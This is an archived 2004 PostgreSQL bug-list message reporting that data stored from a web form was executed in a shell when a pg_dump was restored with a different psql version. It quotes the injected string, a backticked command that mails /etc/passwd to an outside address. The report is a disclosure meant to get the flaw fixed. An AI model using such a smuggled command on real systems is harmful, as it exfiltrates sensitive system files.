Quick Links

syntax error causes crafted data to be executed in shell

From:	"Thomer M(dot) Gil" <postgresql(at)thomer(dot)com>
To:	pgsql-bugs(at)postgresql(dot)org
Subject:	syntax error causes crafted data to be executed in shell
Date:	2004-12-17 18:38:02
Message-ID:	20041217183802.GA26196@dataloss.thomer.com
Views:	Raw Message \| Whole Thread \| Download mbox \| Resend email
Thread:
Lists:	pgsql-bugs

Short summary:

1. Someone wrote "`mail blah(at)blah(dot)com < /etc/passwd`" in a web form;
this string was stored in a postgresql database.
2. We ran pg_dump
3. We ran psql (not the same version as pg_dump!)
4. blah(at)blah(dot)com receives /etc/passwd

More details and the, in my opinion, somewhat reckless response by one
of the Debian postgresql package maintainers are available at:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=285844

Thank you,

Thomer

Responses

Re: syntax error causes crafted data to be executed in shell at 2004-12-17 19:32:10 from Tom Lane

Browse pgsql-bugs by date

	From	Date	Subject
Next Message	Tom Lane	2004-12-17 19:32:10	Re: syntax error causes crafted data to be executed in shell
Previous Message	Tom Lane	2004-12-17 17:06:01	Re: posgresql 8.0 RC1 missing schemas